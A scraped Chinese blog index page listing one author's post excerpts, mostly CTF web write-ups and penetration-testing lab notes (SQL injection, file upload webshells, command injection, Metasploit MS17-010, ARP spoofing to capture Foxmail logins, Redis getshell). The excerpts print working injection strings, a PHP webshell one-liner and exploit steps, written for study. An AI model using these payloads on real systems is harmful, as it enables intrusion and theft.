自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(109)
  • 收藏
  • 关注

原创 buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World-wp

[CISCN2019 华北赛区 Day2 Web1]Hack World知识点fuzzpython盲注脚本过程fuzz一哈一个搜索框,搜索框输入1或2会返回结果,其他都返回bool(false)。过滤了union、and、or、空格等贴上脚本:import requestsurl = "http://a5a19ec2-3fe1-4f07-9465-f4c861d25093.node4.buuoj.cn:81/index.php"result = ""num = 0 # 用

2021-08-10 15:53:04 352 1

原创 buuctf-web-[极客大挑战 2019]HardSQL-wp

[极客大挑战 2019]HardSQL知识点绕过一些简单的过滤right()过程主页是一个登陆页面过滤了关键字 and、=、空格、union等查库check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21查表check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat

2021-08-09 17:37:08 302

原创 buuctf-web-[SUCTF 2019]CheckIn-wp

[SUCTF 2019]CheckIn知识点图片马制作 copy 01.jpg/a + 02.php/b test.jpg.user.ini的上传 GIF89a(如果需要的话) auto_prepend_file=test.jpg过程主页是一个上传页面上传.php,提示非法后缀尝试将.php后缀改成.jpg,提示过滤了<?正常上传图片,上传成功修改请求体中的一句话木马内容为<script language="php">eval($_GET['cmd']

2021-07-25 11:10:59 368

原创 buuctf-web- [ZJCTF 2019]NiZhuanSiWei-wp

[ZJCTF 2019]NiZhuanSiWei知识点data伪协议放置内容( php5.2.0后),通常用来执行php代码file协议读取文件构造序列化内容过程主页就是源代码<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to th

2021-07-24 15:48:17 278

原创 buuctf-web-[BJDCTF2020]Easy MD5-wp

[BJDCTF2020]Easy MD5知识点md5 bypass(数组返回false)过程主页,是这么个框框抓包发现提示select * from 'admin' where password=md5($pass,true)16 位 md5 常见套路,输入密码 ffifdyop,登录即可。这是因为它的原始字符串导致了' or 1=1 的 SQL 注入,相当于所谓的万能密码登录。请参考:https://www.jianshu.com/p/12125291f50dhttp://m

2021-07-23 15:07:52 232

原创 buuctf-web-[极客大挑战 2019]BuyFlag-wp

[极客大挑战 2019]BuyFlag知识点strcmp函数绕过特性cookie中修改标识用户身份的字段过程主页,没发现可用信息右上角菜单,发现一个页面满足条件使用正确的金额购买flag必须是CUIT的学生(请求头中可能存在表示用户身份的东西)输入正确的密码购买flag以及post password<!-- ~~~post money and password~~~if (isset($_POST['password'])) { $password =

2021-07-23 10:31:57 402

原创 buuctf-web-[HCTF 2018]admin-wp

[HCTF 2018]admin知识点flask session伪造过程主页,有注册点和登陆点:登陆点,测试了一下,没有发现sql注入,然后我们随便注册一个账户123 123,登陆看看登陆成功之后,有个提示,说明得使用admin账户登陆之后才能得到flagchangepassword,这里发现源码@app.route('/code')def get_code():@app.route('/index')def index():@app.route('/register

2021-07-18 10:19:23 297

原创 buuctf-web-[ACTF2020 新生赛]BackupFile-wp

[ACTF2020 新生赛]BackupFile知识点备份文件泄露php中的弱类型比较过程使用扫描软件扫一下目录,扫到/index.php.bak<?phpinclude_once "flag.php";if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);

2021-07-17 21:00:49 241 2

原创 buuctf-web-[极客大挑战 2019]BabySQL-wp

[极客大挑战 2019]BabySQL知识点双写绕过过程主页是一个登录框随便输入两个参数,发现是传入的是get型参数首先注入肯定存在,先尝试联合查询注入:check.php?username=admin%27+union+select+1%2C2%2C3%23&password=admin失败,双写union 和 select可绕过check.php?username=admin%27+ununionion+seselectlect+1%2C2%2C3%23&pa

2021-07-16 09:40:30 235

原创 buuctf-web-[极客大挑战 2019]PHP-wp

[极客大挑战 2019]PHP知识点备份文集泄露反序列漏洞过程主页:(提示我们存在备份文件),扫一下常见备份目录发现www.zip,打开源码,在index.php发现有个存在反序列化漏洞然后在class.php中可以看到,如果满足两个条件:password的值等于100username的值等于admin即可输出flag,但是如何让username的值为admin呢?由于wakeup方法会导致username成为guest,因此需要通过序列化字符串中对象的个数来绕过该方法。

2021-07-14 21:01:05 166 3

原创 buuctf-web-[极客大挑战 2019]Upload-wp

[极客大挑战 2019]Upload知识点上传phtml文件嵌在script标签中的一句话木马content-type的修改请求体中的添加文件头过程主页就是上传点,先上传一个正常的shell.php文件发现只能上传image,bp抓包依次尝试文件后缀名修改,content-type修改、文件名%00截断,添加文件头都失败然后更改文件名为xx.phtml,,phtml是嵌入了php代码的html文件,尝试上传,请求体中的内容仍然是普通的一句话木马文件检测到<?请求体中的内

2021-07-12 15:26:19 243 3

原创 buuctf-web-[护网杯 2018]easy_tornado-wp

[护网杯 2018]easy_tornado知识点Python模板注入(ssti)过程根据题目名称tornado,搜索一番,发现tornado是一个Python的模板welcome.txt提示render,经过查询render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。主页:三个文件中分别提示的内容为flag in /fllllllllllllagrendermd5(cookie_secret+md5(filename))然后抓个

2021-07-12 11:10:12 264 1

原创 使用nmap以及Nessus对主机进行信息收集

Nmap目标掌控信息,发现漏洞,便于渗透测试利用主机发现# 使用TCP扫描nmap -sP 192.168.140.0/24 #使用ICMP协议pingnmap -sP 192.168.140.0/24 #使用ICMP协议pingnmap -PS 192.168.140.0/24 #使用SYN协议ping,不会在靶机log留下痕迹nmap -PA 192.168.140.0/24 #使用ACK协议pingnmap -PU 192.168.140.0/24 #使用UDP协议pi

2021-07-03 16:16:58 592 1

原创 使用msf对ms17-010复现

Metasploit目标利用ms07-010漏洞,获得shell启动msfconsole搜索模块search ms17-010使用模块use exploit/windows/smb/ms17_010_eternalblue查看选项show options设置参数set lhost {ip_local}set rhost {ip_romote}运行模块run命令执行help #查看Meterpreter帮助shell #远程命令行shellweb

2021-07-03 16:15:55 416

原创 arp欺骗窃取foxmail中的登陆名和密码

ARP欺骗目标Kali充当中间人,捕获用户在Win7上使用Foxmail时收发邮件的数据包,并窃取登录名和授权码组网组建局域网(NAT模式下)VM_Kali(充当中间人)IP:192.168.140.129MAC:00:0C:29:FB:07:11VM_Win7IP:192.168.140.144MAC:00:0C:29:D6:6D:1B真实机IP:192.168.140.1MAC:00:50:56:C0:00:08在Win7上安装foxmai

2021-07-03 16:14:58 389

原创 信安冬令营实训报告(信息收集,主机渗透,内网渗透)

文章目录一丶摘要二丶实训内容实验一*信息收集Nmap目标主机发现端口扫描开放服务和操作系统检测脚本扫描其他Nessus目标开启服务进入扫描界面使用高级扫描扫描win7其他实验二*主机渗透Metasploit目标启动搜索模块使用模块查看选项设置参数运行模块命令执行其他实验三*内网渗透ARP欺骗目标组网在Win7上安装foxmail安装netwox伪造身份Wireshark抓取流量其他三、测试结果发现的问题四、安全建议关于防护永恒之蓝漏洞的建议关于防护局域网ARP欺骗的建议其他建议一丶摘要在XXX冬令营2

2021-07-03 16:12:54 932

原创 几种常见的安全设备(防火墙、IDS、IPS等)

1.基础防火墙FW/NGFW类主要是可实现基本包过滤策略的防火墙,这类是有硬件处理、软件处理等,其主要功能实现是限制对IP:port的访问。基本上的实现都是默认情况下关闭所有的通过型访问,只开放允许访问的策略。FW可以拦截低层攻击行为,但对应用层的深层攻击行为无能为力。 FW部署位置一般为外联出口或者区域性出口位置,对内外流量进行安全隔离。部署方式常见如下 :2.IDS类此类产品基本上以旁路为主,特点是不阻断任何网络访问,主要以提供报告和事后监督为主,少量的类似产品还提供TCP阻断等功能,但少有

2021-07-01 14:55:05 18651

原创 防火墙的几种部署模式和方法

防火墙的部署模式路由模式当防火墙位于内部网络和外部网络之间时,需要将防火墙与内部网络、外部网络以及DMZ 三个区域相连的接口分别配置成不同网段的IP 地址,重新规划原有的网络拓扑,此时相当于一台路由器。如下图所示,防火墙的Trust区域接口与公司内部网络相连,Untrust 区域接口与外部网络相连。值得注意的是,Trust 区域接口和Untrust 区域接口分别处于两个不同的子网中。采用路由模式时,可以完成ACL 包过滤、ASPF 动态过滤、NAT 转换等功能。然而,路由模式需要对网络拓扑进行修改

2021-07-01 14:48:35 28680

原创 DC靶机渗透系列(DC1-DC3)

收获DC1回顾了metasploit的一些用法利用已知cms的exp来getshellhashcat爆破用法find提权DC2cewl根据网页内容生成字典wpscan结合cewl跑账号和密码用metasploit的模块来ssh爆破rbash->bash--------vim逃逸git提权DC3searchsploit的一些用法在github上搜罗cms探测脚本john爆破用法页面模板里添加一句话木马使用Python开启SimpleHTTPServer公开的

2021-07-01 14:30:10 792

原创 http和https的几种区别

HTTPHTTPS明文传输加密传输80端口443端口不需要CA证书需要CA证书无状态有状态

2021-06-29 21:14:32 98

原创 python的一些小技巧

Python学习Python常见输出方式name = "John"age = 20# % 方式print("My name is %s,I am %s", % (name,age))# format 函数content = "My name is {},I am {}".format(name, age)print(content)# format 函数用索引占位name = "John"content = "My name is {0},I am {0}".format(name)

2021-06-29 21:12:41 141

原创 ctfhub-misc-技能树

数据库流量MYSQL知识点wireshark的过滤搜索功能mysql的登陆过程过程直接搜索字符串ctfhub得到flag过滤协议mysql得到所以mysql协议的流量包然后开始执行sql语句开始查询redis知识点搜索分组字节流过程使用分组字节流,搜索ctfhub得到第一段flag得到第二段flagctfhub{6051d6123de43dfad7609804925c0121}MongoDB知识点搜索十六进制值过程[外链图片转存失

2021-06-29 20:58:33 482 1

原创 NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_3-wp

afr_3考查内容:对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cmdline获取当前执行系统命令,得到查看源代码,中间有个空格的python server.py请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/server.py获取源码@app.route("/n1

2021-06-29 20:54:20 486

原创 NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_2-wp

afr_2nginx配置错误payloadhttp://192.168.60.134/img../flag

2021-06-29 20:53:01 260

原创 NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp

afr_1payloadhttp://192.168.60.134/?p=php://filter/convert.base64-encode/resource=flag这句话的意思是我们用base64编码的方式来读文件index.php;这时页面会显示出源文件index.php经过base64编码后的内容,然后经过base64解码就可以看到flag;BP base64解码得到flag...

2021-06-29 20:52:19 363

原创 NU1LCTFer的成长之路-web入门-CTF中的sql注入-Injection V2.0-wp

Injection V2.0是个登陆框,有两个post的参数,user和pass,先尝试使用一般的联合查询user=admin' and 1=2#&pass=1他过滤了一些东西,把空格换成/**/继续user=admin'/**/and/**/1=2#&pass=1user=admin'/**/and/**/1=1#&pass=1可以看到返回了两种不同的状态用户不存在=>False密码错误=>True返回密码错误,也就是True

2021-06-29 20:50:32 154 1

原创 NU1LCTFer的成长之路-web入门-CTF中的sql注入-sql注入-2-wp

sql注入-2根据网页源代码hint添加get型参数tipsbp抓包,可以发现存在两个post型参数,name和pass,尝试了一番union联合查询注入,无法利用,遂改报错注入,这里使用updatexml发现可以正常注入name=admin' and updatexml(1,concat(0x7e,(select 1),0x7e),1)#&pass=111111查当前数据库 notename=admin' and updatexml(1,concat(0x7e,(select

2021-06-29 20:49:49 269

原创 NU1LCTFer的成长之路-web入门-CTF中的sql注入-sql注入-1-wp

sql注入-1主页是这个样子判断注入类型 字符型 单引号id=1' and 1=1--+id=1' and 1=2--+判断列数 三列id=-1' order by 3--+查询是否有显示位 union联合查询注入 2、3号位id=-1 union select 1,2,3--+查询数据库 informaion_schema、noteid=-1' union select 1,(select concat(schema_name) from information

2021-06-28 21:57:01 256

原创 NU1LCTFer的成长之路-web入门-CTF中的sql注入-injection-wp

injection主页是这个样子判断注入类型 数字型id=1 and 1=1#id=1 and 1=2#判断列数 两列id=1 order by 2#查询是否有显示位 union联合查询注入 2号位id=1 union select 1,2#查询数据库 ctfhub、informaion_schemaid=1 union select 1,(select concat(schema_name) from information_schema.schemata li

2021-06-28 21:56:29 156

原创 NU1LCTFer的成长之路-web入门-信息收集-粗心的小李-wp

粗心的小李直接使用scrabble一把梭./scrabble http://192.168.60.134/文件下多出一个index.php,里面即可看到flag

2021-06-28 21:53:21 215

原创 NU1LCTFer的成长之路-web入门-信息收集-举足轻重的信息搜集-wp

举足轻重的信息搜集直接扫下目录flag被分成了3段flag1=>robots.txt里面的flag1_is_her3_fun.txtflag1:n1book{info_1flag2=>http://192.168.60.134/index.php~flag2:s_v3ry_imflag3=>http://192.168.60.134/.index.php.swp中打开搜索flag得到flag3flag3:p0rtant_hack}最终flagn1book{in

2021-06-28 21:51:43 154

原创 第十四届信息安全竞赛-easy_sql-wp

随便输入一些,发现是post注入,直接bp抓包,将数据包内容全部放到1.txt中,sqlmap跑起来sqlmap -r 1.txt --batch发现三种类型的注入,接着我们跑下数据库sqlmap -r 1.txt --batch --dbs继续,爆表试试sqlmap -r 1.txt --batch -D security --tables发现到这一步,sqlmap就跑不了了,所以后端php脚本肯定是过滤了某些字符串,手动测试下,这里使用报错注入来试一试uname=admin'.

2021-06-28 21:50:14 170 1

原创 第十四届信息安全竞赛-easy_sourcew-wp

扫下目录,.index.php.swo泄露完整代码本题目没有其他代码了噢,就只有这一个文件,虽然你看到的不完全,但是你觉得我会把flag藏在哪里呢,仔细想想文件里面还有什么?<?phpclass User{ private static $c = 0; function a() { return ++self::$c; } function b() { return ++self::$c; }.

2021-06-28 21:49:39 148 2

原创 redis未授权访问getshell的方式

redis简介Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库端口:6379环境kali =>192.168.60.134cenos => 192.168.60.130redis未授权访问Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上./redis-server 使用默认配置./red

2021-06-28 21:47:18 2073

原创 buuctf-web-[GXYCTF2019]Ping Ping Ping-wp

[GXYCTF2019]Ping Ping Ping知识点变量拼接sh,bash下编码绕过空格过滤绕过关键字过滤过程主页:?ip=127.0.0.1?ip=127.0.0.1;ls?ip=127.0.0.1;cat flag.php过滤了空格,使用$IFS$1来绕过?ip=127.0.0.1;cat$IFS$1flag.php过滤了flag,但是可以查看下index.php?ip=127.0.0.1;cat$IFS$1index.php|

2021-06-28 21:38:52 228

原创 buuctf-web-[极客大挑战 2019]Knife-wp

[极客大挑战 2019]Knife知识点蚁剑或者中国菜刀等工具的使用过程主页:直接给出这个主页就是一句话木马蚁剑连接,根目录查看到flag

2021-06-28 21:37:02 194

原创 buuctf-web-[极客大挑战 2019]Http-wp

[极客大挑战 2019]Http知识点X-Forwarded-ForrefererUA的修改过程直接发现Secret.php请求头中添加referer修改user-agent添加X-Forwarded-For得到flag

2021-06-28 21:36:22 110

原创 buuctf-web-[GXYCTF2019]Ping Ping Ping-wp

[GXYCTF2019]Ping Ping Ping知识点变量拼接sh,bash下编码绕过空格过滤绕过关键字过滤过程主页:?ip=127.0.0.1?ip=127.0.0.1;ls?ip=127.0.0.1;cat flag.php过滤了空格,使用$IFS$1来绕过?ip=127.0.0.1;cat$IFS$1flag.php过滤了flag,但是可以查看下index.php?ip=127.0.0.1;cat$IFS$1index.php|

2021-06-27 21:49:54 250 2

原创 buuctf-web-[极客大挑战 2019]LoveSQL-wp

[极客大挑战 2019]LoveSQL知识点常规union select注入过程主页:抓包分析下手动测试下注入点order by查下字段admin' order by 3#union select寻找显示位-admin' union select 1,2,3%23查表-admin' union select 1,(select group_concat(table_name) from information_schema.tables where tab

2021-06-27 21:14:30 194 1

原创 buuctf-web-[ACTF2020 新生赛]Exec-wp

[ACTF2020 新生赛]Exec知识点命令执行过程主页面:这里是存在命令执行漏洞的,我们尝试去使用;执行命令127.0.0.1;cat /flag

2021-06-25 14:32:38 204

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除